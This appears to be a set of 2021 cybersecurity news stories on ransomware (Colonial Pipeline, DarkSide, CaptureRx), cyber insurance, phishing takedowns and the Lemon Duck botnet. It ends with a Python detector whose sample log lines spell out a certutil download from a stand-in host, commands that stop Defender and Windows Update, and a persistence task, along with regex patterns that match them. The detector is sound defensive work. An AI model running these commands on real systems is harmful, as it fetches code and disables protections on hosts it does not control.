More stories

    Ransomware: Survive by outrunning the guy next to you

    “There are two people in a wood, and they run into a bear. The first person gets down on his knees to pray; the second person starts lacing up his boots. The first person asks the second person, ‘My dear friend, what are you doing? You can’t outrun a bear.’ To which the second person responds, ‘I don’t have to. I only have to outrun you.’” – The Imitation Game

    A ransomware attack hit a major US pipeline this weekend, leading to a shutdown in operations for the past three days. Colonial Pipeline will remain shut down for an unknown amount of time, as the organization is ‘developing a system restart plan’ in real time. Critical infrastructure and pieces of the supply chain (which were already fragile due to the pandemic) continue to be taken down by ransomware attacks, either advertently or inadvertently. This has a number of downstream effects on the supply chain, which cause recovery times to grow even longer as the many companies that these suppliers rely on also attempt to recover.

    Ransomware is ultimately about business disruption

    This attack comes on the heels of a crippling year of ransomware attacks across the globe, especially those targeting healthcare organizations. The name of the game: business disruption. Critical infrastructure providers are being targeted by ransomware actors because, when hit with ransomware, they need to choose between indefinite suspension of critical business processes or paying the ransom. Shutting down a crucial resource for an indeterminate amount of time is simply not a sustainable option for a business, and it backs affected providers into a corner where their only option is to pay up.

    Federal Policy Is Finally On The Table

    The pipeline operated by Colonial Pipeline delivers around 45% of the fuel consumed on the east coast, making it a massive supplier for the United States. This has elevated the attack to a potential national security threat, with the US government issuing a state of emergency for the length of the shutdown. This demonstrates the continued blurring of the lines between the public and private sector when it comes to the impact of a cyberattack on nation states. The Biden administration has made securing federal cybersecurity defenses a top priority and planned on passing legislation even before this attack occurred. As these attacks become more frequent, there is some expectation that this legislation could eventually bleed into the private sector, especially critical sectors such as finance, pharmaceuticals and energy, which could be required to demonstrate a certain level of information security maturity (like the United States Department of Defense’s Cyber Maturity Model Certification, CMMC, which is required for the contractors it currently uses).

    What can you do about it right now?

    As the quote above and the title of this blog suggest, cybercriminals follow Occam’s razor: they are looking for the easiest way to make money. Even the attackers in this specific incident stated publicly, “our goal is to make money”. So what do security pros need to do right now to lower their risk in the face of future ransomware attacks? Outrun the guy next to you.

    Speaking to Chris Krebs’ valuable advice from this morning, security pros at every organization should implement these quick wins right now to limit the impact of a ransomware attack: 

    • Enforce strong passwords. No password12345 has any business being in your organization. Build a password policy that enforces strong passwords by default.
    • Check your backups. Make sure you have working backups of data that your organization could not live without. Test whether your backups include what you care about and test whether they restore successfully. Backups are your last line of defense and are critical.
    • Implement multifactor authentication (MFA) that is easy to use and ubiquitous. This should front the entry points into your infrastructure, whether that is your identity provider (Azure AD, ADFS, Okta, Ping, etc.), your VPN (Pulse Secure, Cisco AnyConnect, etc.) or a combination of the two. MFA avoids the issue of stolen logins/credentials being easily used to siphon data and infect your organization.
    • Secure privileged accounts immediately. In most of these attacks, we continue to see that domain administrator accounts or other types of privileged accounts are on almost every endpoint or have permission to critical applications, giving the attackers an easy way to move laterally. Take inventory of those types of accounts and remove them where possible. Only give employees local administrative rights when necessary; it should never be the default.
    • Update and test your incident response plan. Your response plan needs to cover what happens when you inevitably get infected with ransomware and what the plan is for both your technology and business departments. It also needs to include who you will contact for help when you are hit, which could be your MSSP or another incident response organization that you have on retainer.
    • Ensure that your endpoint protection and security policies on your endpoints are up to date, enforced, and the protection is turned on and working. Often we see organizations that have things like real-time protection disabled, whose antivirus definitions were last updated weeks ago, or that have cloud protection turned on but not working because it cannot get out to the internet. Talk to your endpoint protection vendor and ask them about the appropriate health checks to make sure these products are installed, turned on, and working as expected.
    • Make sure that your devices are being patched regularly. Prioritize critical assets like externally facing devices such as VPN concentrators or servers sitting in a DMZ. Ultimately, your organization should be reducing the time that it takes to patch software and operating systems, as monthly patch cycles don’t address how quickly attackers are moving and the remote nature of work.
    • Block uncommon attachment types at your email gateways. Your employees shouldn’t be receiving attachments ending in .exe, .scr, .ps1, .vbs, etc. Microsoft actually blocks a number of these by default in Outlook, but you should take a look at your email security solution and ensure they’re only allowed by exception.

    Longer term, we know that the way we’ve been doing things isn’t working. Focus on moving from a perimeter-based security architecture to one based on Zero Trust to effectively limit lateral movement and contain the blast radius of a multitude of types of attacks (phishing, malware, supply chain, etc.).

    This post was written by Analysts Allie Mellen and Steve Turner, and it originally appeared here.

    Ransomware attack on healthcare admin company CaptureRx exposes multiple providers across United States

    Multiple healthcare providers across the United States are reporting being impacted by a ransomware attack on CaptureRx, a San Antonio-based company providing drug-related administrative services.

    At least three healthcare-related institutions — including UPMC Cole and UPMC Wellsboro in Pennsylvania, Lourdes Hospital and Faxton St. Luke’s Healthcare in New York, Gifford Health Care in Randolph, Vermont, and a number of Thrifty Drug Stores — have reportedly had the health information of customers or patients exposed and stolen in the breach. The HIPAA Journal reported that at least 17,655 patients at Faxton St. Luke’s Healthcare, 6,777 patients at Gifford Health Care, and 7,400 at UPMC Cole and UPMC Wellsboro had their information accessed by the cyberattackers, but it is still unclear how many patients were exposed in total and how many CaptureRx customers were affected.

    In a statement, CaptureRx said its team began investigating its systems after someone noticed “unusual activity involving certain of its electronic files” on February 6. By February 19, the company confirmed that patient files, including names, dates of birth, prescription information and medical record numbers, had been accessed and stolen. From March 30 to April 7, the company notified all of the healthcare providers that had been breached and worked with them to contact everyone whose information had been stolen. The company statement urges those affected to monitor their accounts for any unexpected activity.

    Justin Fier, director of strategic threat and analysis at cybersecurity company Darktrace, said the healthcare sector will remain a prime target for ransomware attacks not only because of the vast amount of personal, and often sensitive, medical data available, but also because healthcare systems simply cannot afford downtime — meaning organizations like CaptureRx are more likely to pay a ransom. Fier added that the emergence of open-source tools and ransomware-as-a-service providers available on the dark web is spurring the increasing frequency of attacks in 2021, noting the recent attack on Swedish radiology software provider Elekta, which affected over 42 U.S. healthcare sites while also preventing cancer patients from receiving necessary radiation treatment.

    Many cybersecurity experts noted that healthcare organizations are particularly ripe targets for ransomware gangs because they carry troves of patient data that can be sold on the dark web or effectively sold back to healthcare organizations for ransom. Healthcare organizations also carry data that cannot be changed, like SSNs and other personal information. 

    Flashpoint senior director of intelligence Ian Gray explained that some of the publicly reported high-profile attacks from the past year indicate that larger providers with thousands of downstream providers may have a higher willingness to pay to decrypt the data, or to prevent it from being leaked on a ransomware site.

    Any breach of personal health care information violates parts of HIPAA and generally triggers investigations by the U.S. Government’s Office of Civil Rights, according to Garret Grajek, CEO of YouAttest. Grajek added that in 2020, both Athens Orthopedic and Lifespan Health System were fined, $1.5 million and $1.04 million respectively, following breaches.

    Ransomware became such a problem for healthcare organizations in 2020 that the Center for Internet Security began offering a no-cost ransomware protection service for private hospitals in the U.S. that may not be able to afford a robust cybersecurity service.

    Saumitra Das, CTO at cybersecurity firm Blue Hexagon, said the CaptureRx attack highlights the impact of the software supply chain. “Not only can you be breached due to a software you installed with high privilege internally (e.g. Solarwinds) but you can also be breached due to your partners who handle your data being breached,” Das said. “Organizations need to look very closely at all their partners who have access to their important data, verify their security practices, and work with the least privilege when possible.”

    DarkSide explained: the ransomware group responsible for Colonial Pipeline cyberattack

    When speaking to a cybersecurity expert concerning the Microsoft Exchange Server vulnerabilities several months ago and its impact on thousands of organizations worldwide, they asked, “What could possibly be worse this year?”

    Perhaps the situation the United States finds itself in now, with a major pipeline down due to ransomware, comes close. Colonial Pipeline, which supplies 45% of the East Coast’s fuel, revealed a ransomware outbreak on the company’s systems which forced the suspension of operations and some IT systems on Friday, as previously reported by ZDNet. The attack took place on May 7, and at the time of writing, supply is yet to resume.

    Data breaches and security incidents at enterprise organizations are commonplace, and hardly a week goes by without news of yet another cyberattack on a well-known company — but when core, critical utilities and national infrastructure are involved, things take an even more serious turn.

    Colonial Pipeline says that a system restart plan is being “developed” and some small lateral lines are back in service. However, it may be days before full functions are restored, and in the meantime, gasoline futures are rising and there is concern that some parts of the US may experience fuel shortages. Gasoline futures jumped to their highest level in three years due to the cyberattack.

    The USDOT Federal Motor Carrier Safety Administration (FMCSA) has issued a Regional Emergency Declaration to try to push back against the supply disruption through temporary exemptions for fuel transport on the road and for the permissible hours that drivers are allowed to work. The FBI said on May 10 that the agency is working with Colonial to investigate the incident.

    But who is responsible? According to the FBI, the DarkSide ransomware group. “The FBI confirms that the Darkside ransomware is responsible for the compromise of the Colonial Pipeline networks,” the law enforcement agency says. “We continue to work with the company and our government partners on the investigation.”

    DarkSide is a group believed to have been active since the summer of 2020. DarkSide’s malware is offered under a Ransomware-as-a-Service (RaaS) model, and once a system has been breached, ransomware payment demands can range from $200,000 to $2,000,000. The group has previously been connected to “big game” hunting methods, in which large organizations are targeted — which would fit with the Colonial Pipeline incident. Other cybercriminal organizations follow the same path, including Hades ransomware operators, which appear to specifically target companies with annual revenue of at least $1 billion. DarkSide 2.0, the latest version of the ransomware, was recently released under an affiliates program.

    DarkSide also employs double-extortion tactics — joining the likes of Maze, Babuk, and Clop, among others — to pressure victims into paying up. At the time of a cyberattack, confidential information may be stolen and threats made to publish this data on a leak site if the victim refuses to give in to blackmail. The leak site operated by DarkSide has gone so far as to create a press corner for journalists and ‘recovery’ firms to reach them directly.

    On the leak site, the ransomware group claims to have a code of conduct that prevents attacks against funeral services, hospitals, palliative care, nursing homes, and some companies involved in the distribution of the COVID-19 vaccine. DarkSide also seems to have gone to some lengths to portray themselves as a kind of Robin Hood. As noted by Cybereason, the group claims that part of ransomware payments go to charity. “Some of the money the companies have paid will go to charity,” DarkSide said in a forum post. “No matter how bad you think our work is, we are pleased to know that we helped change someone’s life.” According to the researchers, however, this attempt to seem like the good guys has fallen flat, with $20,000 in stolen Bitcoin (BTC) donations rejected by charities due to their criminal sources.

    In direct contrast to the charity-giving group image, however, the cyberattack on Colonial Pipeline has caused intense disruption economically and socially — and this appears to be a situation the ransomware operators want to distance themselves from. “We are apolitical, we do not participate in geopolitics, do not need to tie us with a defined government and look for other our motives,” DarkSide said in a statement dated May 10. “Our goal is to make money, and not creating problems for society. We [will] introduce moderation and check each company that our partners want to encrypt to avoid social consequences in the future.”

    And yet, the extortion continues, with countdowns on the leak site showing the next batch of dumped, stolen files belonging to other organizations due for release in a matter of hours, at the time of writing. It should also be noted that when victim companies refuse to pay, DarkSide is willing to share insider information ahead of the publication of stolen data. “If the company refuses to pay, we are ready to provide information before the publication, so that it would be possible to earn in the reduction price of shares,” the group says. “Write to us in ‘Contact Us’ and we will provide you with detailed information.”

    While cybercriminals like DarkSide profit, companies like Colonial Pipeline become collateral damage — and this organization is unlikely to be the final victim on the list. On May 10, Colonial Pipeline said the firm must take a “phased approach” in restoring supply and it is hoped that operations can fully resume by the end of the week. “While this situation remains fluid and continues to evolve, the Colonial operations team is executing a plan that involves an incremental process that will facilitate a return to service in a phased approach. This plan is based on a number of factors with safety and compliance driving our operational decisions, and the goal of substantially restoring operational service by the end of the week. The company will provide updates as restoration efforts progress.”

    Colonial Pipeline aims to restore operations by end of the week after cyberattack

    Colonial Pipeline said Monday its goal is to substantially restore operational service “by the end of the week” following last week’s ransomware attack, which forced the company to shut down operations and has the potential to hamper fuel distribution for the Eastern US.

    In a statement, Colonial Pipeline said:

    “Restoring our network to normal operations is a process that requires the diligent remediation of our systems, and this takes time. In response to the cybersecurity attack on our system, we proactively took certain systems offline to contain the threat, which temporarily halted all pipeline operations, and affected some of our IT systems. To restore service, we must work to ensure that each of these systems can be brought back online safely.

    While this situation remains fluid and continues to evolve, the Colonial operations team is executing a plan that involves an incremental process that will facilitate a return to service in a phased approach. This plan is based on a number of factors with safety and compliance driving our operational decisions, and the goal of substantially restoring operational service by the end of the week. The Company will provide updates as restoration efforts progress.”

    Colonial Pipeline is responsible for supplying 45% of the East Coast’s fuel, including gasoline, diesel, jet fuel, home-heating oil, and fuel for the US military.

    The FBI confirmed Monday that the Russia-based hacker group DarkSide was behind the attack on Colonial Pipeline. The group runs a ransomware-as-a-service business and sells cybercrime tools to other malicious groups. DarkSide is known for encrypting data for ransom and also for stealing data and using the threat of its exposure as leverage for ransom payouts. In a press briefing, US President Joe Biden said there is no evidence currently that the Russian government was involved in the attack, though the threat actor’s ransomware clearly originates from the country.

    On Monday, DarkSide posted a statement to its website that addresses the attack and the Colonial Pipeline shutdown.

    “We are apolitical, we do not participate in geopolitics, do not need to tie us with a defined government and look for our motives,” the statement said. “Our goal is to make money, and not creating problems for society. From today we introduce moderation and check each company that our partners want to encrypt to avoid social consequences in the future.”

    AXA pledges to stop reimbursing ransom payments for French ransomware victims

    Insurance company AXA has revealed that, at the request of French government officials, it will end cyber insurance policies in France that pay ransomware victims back for ransoms paid out to cybercriminals. 

    While unconfirmed, the Associated Press reported that the move was an industry first. AXA is one of the five biggest insurers in Europe and made the decision as ransomware attacks become a daily occurrence for organizations across the world. ZDNet reported last month that AXA is the cyber insurance market share leader based on standalone policies.

    The changes were made only in France, after cybersecurity leaders within the French government and French senators aired concerns about the massive payouts going to cybercriminals during a roundtable in Paris in April.

    French companies and enterprises, like those in the US, lost billions in 2020 due to devastating ransomware attacks that left organizations crippled for days or weeks, with some estimates showing the country suffered up to $5.5 billion in losses. Only the US had more ransomware attacks in 2020 than France, according to French cybercrime prosecutor Johanna Brousse, who spoke at the Paris roundtable, as reported by The Associated Press. Christine Weirsky, a spokeswoman for the US AXA subsidiary, told The Associated Press that their cyber insurance policies would still cover the costs of recovery.

    A report from cyber insurance provider Coalition in September noted that ransomware incidents represented 41% of all cyber insurance claims filed in the first half of 2020. The company said there was a 260% increase in the frequency of ransomware attacks among their policyholders and found that the average ransom demand increased 47%. Claims ranged from as low as $1,000 to $2 million.

    Cybersecurity experts have long complained that cyber insurance policies that include coverage for ransom payouts have had a disastrous effect, making ransomware more popular and actually spurring more attacks. Knowing that insurance companies would cover company payouts, ransomware attackers became more and more brazen throughout 2020 and 2021. Many of the attacks in 2020 specifically targeted crucial government institutions like hospitals or K-12 schools, knowing they were more likely to have to pay in order to regain control of systems and important data.

    “This decision is not a surprise to us. In fact, other carriers may follow the suit. However, businesses need protection from these events and in some cases even from going bankrupt due to ransomware,” said Cowbell Cyber CEO Jack Kudale, adding that often the cost of the ransom itself equals other damaging attack costs like business interruption, notification, restoration, credit monitoring, forensics, and crisis management.

    Other experts, like Digital Shadows senior cyber threat intelligence analyst Xue Yin Peh, explained that even when organizations are forced to pay ransoms, there is no guarantee that encrypted files and systems will be recovered. Even premiums associated with cyber insurance may increase as a result of a ransomware attack, she added.

    Sean Cordero, security advisor at Netenrich, said he expects more cyber insurance providers like AXA to seek to minimize their exposure from high-risk policies they’ve written or are considering underwriting, making it more difficult to secure or renew policies. For the first time, some insurers will request new evidence and validation from their policyholders to prove the adequacy of the policyholders’ controls, Cordero explained. “This validation is complex, and many insurers still rely on client self-attestation as the primary input to risk and policy determination. These insurers will hopefully transition to more data-driven models specific to the cybersecurity industry. For huge organizations, this may translate into third-party audits before completing underwriting,” Cordero said.

    Cordero added that some cyber insurers are now using attack surface intelligence, data science, cyber-specific actuarial models, and more to address the increase in attacks and reduce premiums. This, Cordero said, may “lead to broader coverage when the insured can prove their controls and readiness.”

    This security project has taken down 1.5 million scam, phishing and malware URLs in just one year

    More websites hosting phishing domains and other online scams have been taken down during the last year than during the previous three years combined. The UK’s National Cyber Security Centre’s (NCSC) fourth annual Active Cyber Defence report details how it helped remove many more scams from the internet: in total, more than 1.4 million URLs responsible for 700,000 online scams have been removed by the NCSC’s takedown service during the last 12 months.

    The last year has seen a big rise in Covid-19 themed cyber crime, and the NCSC has helped to take down thousands of URLs associated with phishing and malware attacks using warnings about Covid-19 or false offers of vaccines.

    The NCSC also helped to take down fake online shops hosted in the UK, as well as fake celebrity endorsement scams used in an attempt to lure people into falling victim to cyber attacks. Often these scams begin with phishing messages which take victims through several URLs before they land on the final malicious site.

    Scams and phishing campaigns designed to look like they came from the government, the NHS, HMRC and many other high profile organisations have all been taken down as part of the NCSC’s Active Cyber Defence (ACD) programme, which it said aims to protect “the majority of people in the UK from the majority of the harm caused by the majority of the cyber attacks the majority of the time.”

    Tools in the ACD arsenal include the takedown service for finding malicious sites and sending notifications to the host to remove them from the internet. It also includes the Suspicious Email Reporting Service, a feature introduced last year which allows members of the public to forward emails suspected to be fraudulent directly to the NCSC for further investigation.

    To date, the service has received over four million emails and has helped identify more than 1.5 million malicious URLs, leading to the takedown of tens of thousands of scams that hadn’t previously been identified. However, the report noted there was also a decrease in the percentage of attacks taken down within 24 hours, from 64.6% in 2019 to 55.5% in 2020.

    “The ACD programme is truly a collaborative effort, and it’s thanks to our joint efforts with partners both at home and internationally that we’ve been able to significantly ramp up our efforts to protect the UK,” said Dr Ian Levy, technical director of the NCSC.

    “The bold defensive approach taken by the ACD programme continues to ensure our national resilience and so I urge public bodies, companies and the general public to sign up to the services available to help everyone stay safe online,” he added.

    Amazon seized, destroyed two million fake products sent to warehouses in 2020

    Amazon’s crusade against counterfeit product sellers on the firm’s platform continues with two million products seized and destroyed in 2020. 

    The e-commerce giant, known for shopping events such as Prime Day, allows third-party sellers across the globe to tout their wares on the Amazon platform. However, it takes only a brief glance at some products to know there are issues. Fake, counterfeit products, poor quality, misleading photos, and more are all noted in buyer reviews, and there are vast numbers of counterfeit operations that Amazon is attempting to detect and remove. While some sellers abuse the platform in colorful ways — such as the case of an Instagram influencer who was shut down after allegedly selling dupes with pictures of generic products in the marketplace — others continue to trade without detection.

    However, Amazon wants to bring “counterfeit to zero” on the platform and, to benchmark the firm’s progress, has released its first Brand Protection Report (.PDF) to the public. According to the report, which documents anti-counterfeit activities during 2020, there have been “increased attempts by bad actors to commit fraud and offer counterfeit products,” leading to the seizure of millions of products sent to fulfillment centers, which were then destroyed. “Amazon destroyed those products to prevent them from being resold elsewhere in the supply chain,” the company says.

    The e-commerce giant added that over 10 billion “suspect” listings were blocked before being published, and over six million attempts to create seller accounts suspected of being involved in counterfeit operations were prevented. When it comes to brands being impersonated by counterfeit sellers, Amazon says that less than 0.01% of products sold received an allegation from a customer of being fake, and in these cases, over 7,000 SMBs were connected via Amazon’s Counterfeit Crimes Unit to legal teams in the US and Europe. Over $700 million was invested in 2020 to combat counterfeit product operations.

    “Amazon continues to innovate on its robust proactive controls and powerful tools for brands, and won’t rest until there are zero counterfeits in its store,” Amazon commented. “However, this is an escalating battle with criminals that continue to look for ways to sell counterfeits, and the only way to permanently stop these counterfeiters is to hold them accountable through the court system and criminal prosecution.”

    Another problem that likely gives Amazon a headache is the custom of unscrupulous sellers who pay customers to leave five-star reviews. A data leak earlier this month implicated approximately 200,000 individuals in a review scam — potentially originating from China — in which sellers ‘refund’ a product’s price once a glowing review is left on the item’s Amazon listing. In response, the company said, “we suspend, ban, and take legal action against those who violate [community and review] policies.”

    Lemon Duck hacking group adopts Microsoft Exchange Server vulnerabilities in new attacks

    Researchers have explored the latest activities of the Lemon Duck hacking group, including the exploitation of Microsoft Exchange Server vulnerabilities and the use of decoy top-level domains.

    The active exploitation of zero-day Microsoft Exchange Server vulnerabilities in the wild was a security disaster for thousands of organizations. Four critical flaws, dubbed ProxyLogon, impact on-prem Microsoft Exchange Server 2013, 2016, and 2010. Patches, vulnerability detection tools, and mitigation instructions were made available in March, but it is still estimated that up to 60,000 organizations may have been compromised. Exploit code, too, is now available, and at least 10 advanced persistent threat (APT) groups have adopted the flaws in attacks this year.

    In late March, Microsoft said the Lemon Duck botnet had been observed exploiting vulnerable servers and using the systems to mine for cryptocurrency. Now, researchers from Cisco Talos have provided a deep dive into the cyberattackers’ current tactics. Lemon Duck operators are incorporating new tools to “maximize the effectiveness of their campaigns” by targeting the high-severity vulnerabilities in Microsoft Exchange Server, and telemetry data on DNS queries to Lemon Duck domains indicates that campaign activity spiked in April.

    The majority of queries came from the US, followed by Europe and South East Asia. A substantial spike in queries to one Lemon Duck domain was also noted in India.

    Lemon Duck operators use automated tools to scan, detect, and exploit servers before loading payloads such as Cobalt Strike DNS beacons and web shells, leading to the execution of cryptocurrency mining software and additional malware. The malware and associated PowerShell scripts will also attempt to remove antivirus products offered by vendors such as ESET and Kaspersky and will stop any services — including Windows Update and Windows Defender — that could hamper an infection attempt. Scheduled tasks are created to maintain persistence, and in recent campaigns, the CertUtil command-line program is utilized to download two new PowerShell scripts that are tasked with the removal of AV products, creating persistence routines, and downloading a variant of the XMRig cryptocurrency miner. Competing cryptocurrency miner signatures, too, are hardcoded and written up in a “killer” module for deletion.

    SMBGhost and EternalBlue have been used in past campaigns, but as the exploitation of Microsoft Exchange Server flaws shows, the group’s tactics are constantly changing to stay ahead of the curve. Lemon Duck has also been creating decoy top-level domains (TLDs) for China, Japan, and South Korea to try to obfuscate command-and-control (C2) infrastructure. “Considering these ccTLDs are most commonly used for websites in their respective countries and languages, it is also interesting that they were used, rather than more generic and globally used TLDs such as ‘.com’ or ‘.net’,” Cisco Talos notes. “This may allow the threat actor to more effectively hide C2 communications among other web traffic present in victim environments.” Overlaps between the Lemon Duck botnet and Beapy/Pcastle cryptocurrency malware have also been observed.

    “The use of new tools like Cobalt Strike, as well as the implementation of additional obfuscation techniques throughout the attack lifecycle, may enable them to operate more effectively for longer periods within victim environments,” the researchers say. “New TTPs consistent with those reportedly related to widespread exploitation of high-profile Microsoft Exchange software vulnerabilities, and additional host-based evidence suggest that this threat actor is also now showing a specific interest in targeting Exchange Servers as they attempt to compromise additional systems and maintain and/or increase the number of systems within the Lemon Duck botnet.”
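    The three host-side behaviours Talos describes above (CertUtil used as a downloader, Windows Update and Windows Defender services stopped, scheduled tasks created for persistence) all show up in ordinary process-creation telemetry. The following Python is an added example, not code from the article or from Cisco Talos: it runs simple detection rules over constructed sample command lines and only escalates a host when several behaviours chain together, since any one of them on its own can be legitimate administration. The log format, host names, paths and the `.invalid` domain are assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# Constructed sample process-creation telemetry, one event per line:
# "<timestamp>\t<host>\t<user>\t<command line>". The format, host names,
# paths and domain are assumptions for this example, not real indicators.
SAMPLE_EVENTS = """\
2021-04-12T03:14:07Z\tEXCH01\tNT AUTHORITY\\SYSTEM\tcmd.exe /c certutil.exe -urlcache -split -f http://lemon.example.invalid/a.ps1 C:\\Windows\\Temp\\a.ps1
2021-04-12T03:14:09Z\tEXCH01\tNT AUTHORITY\\SYSTEM\tpowershell.exe -nop -w hidden -File C:\\Windows\\Temp\\a.ps1
2021-04-12T03:14:11Z\tEXCH01\tNT AUTHORITY\\SYSTEM\tsc.exe stop WinDefend
2021-04-12T03:14:12Z\tEXCH01\tNT AUTHORITY\\SYSTEM\tpowershell.exe -c Stop-Service -Name wuauserv -Force
2021-04-12T03:14:15Z\tEXCH01\tNT AUTHORITY\\SYSTEM\tschtasks.exe /create /tn "\\Microsoft\\Windows\\Update" /tr "powershell -w hidden -File C:\\Windows\\Temp\\b.ps1" /sc minute /mo 30 /ru SYSTEM /f
2021-04-12T08:02:44Z\tWS042\tCORP\\jdoe\tcertutil.exe -hashfile C:\\Users\\jdoe\\Downloads\\setup.msi SHA256
2021-04-12T08:05:10Z\tWS042\tCORP\\jdoe\tschtasks.exe /query /tn "\\Microsoft\\Windows\\Update"
"""


@dataclass(frozen=True)
class Finding:
    timestamp: str
    host: str
    rule: str
    command: str


# Services whose stoppage hampers detection or patching (compared case-folded).
PROTECTED_SERVICES = {"windefend", "wuauserv", "wscsvc", "mpssvc", "sense"}

# certutil pulling content from a URL rather than its normal certificate work.
RX_CERTUTIL_DOWNLOAD = re.compile(
    r"\bcertutil(?:\.exe)?\b.*\b(?:urlcache|verifyctl)\b.*https?://", re.I)
# sc / net / Stop-Service acting on a service; group 1 captures the name.
RX_SERVICE_STOP = re.compile(
    r"(?:\bsc(?:\.exe)?\s+(?:stop|delete|config)\s+|\bnet(?:\.exe)?\s+stop\s+"
    r"|\bstop-service\s+(?:-name\s+)?)(\w+)", re.I)
# Task creation whose action is PowerShell run from a world-writable location.
RX_TASK_CREATE = re.compile(r"\bschtasks(?:\.exe)?\s+/create\b", re.I)
RX_WRITABLE_DIR = re.compile(r"\\(?:temp|public|appdata|programdata)\\", re.I)


def classify(command: str) -> List[str]:
    """Return the names of every rule the command line trips (may be empty)."""
    rules: List[str] = []
    if RX_CERTUTIL_DOWNLOAD.search(command):
        rules.append("certutil_download")
    m = RX_SERVICE_STOP.search(command)
    if m and m.group(1).lower() in PROTECTED_SERVICES:
        rules.append("defense_service_stop")
    if (RX_TASK_CREATE.search(command) and "powershell" in command.lower()
            and RX_WRITABLE_DIR.search(command)):
        rules.append("suspicious_scheduled_task")
    return rules


def detect(events: str) -> List[Finding]:
    """Parse tab-separated events and emit one Finding per (event, rule) hit."""
    findings: List[Finding] = []
    for line in events.splitlines():
        if not line.strip():
            continue
        ts, host, _user, cmd = line.split("\t", 3)
        for rule in classify(cmd):
            findings.append(Finding(ts, host, rule, cmd))
    return findings


def hosts_with_chain(findings: List[Finding], min_rules: int = 2) -> Set[str]:
    """Hosts that tripped at least min_rules distinct rules. A lone certutil
    download or service stop may be admin activity; the combination is what
    matches the download / disable-defenses / persist chain described above."""
    seen: Dict[str, Set[str]] = {}
    for f in findings:
        seen.setdefault(f.host, set()).add(f.rule)
    return {host for host, rules in seen.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f.timestamp} {f.host} {f.rule}: {f.command}")
    print("hosts with chained behaviour:", sorted(hosts_with_chain(hits)))
```

The benign rows (a hash check with certutil, a task query) produce no findings, while the Exchange host trips three distinct rules and is the only one escalated.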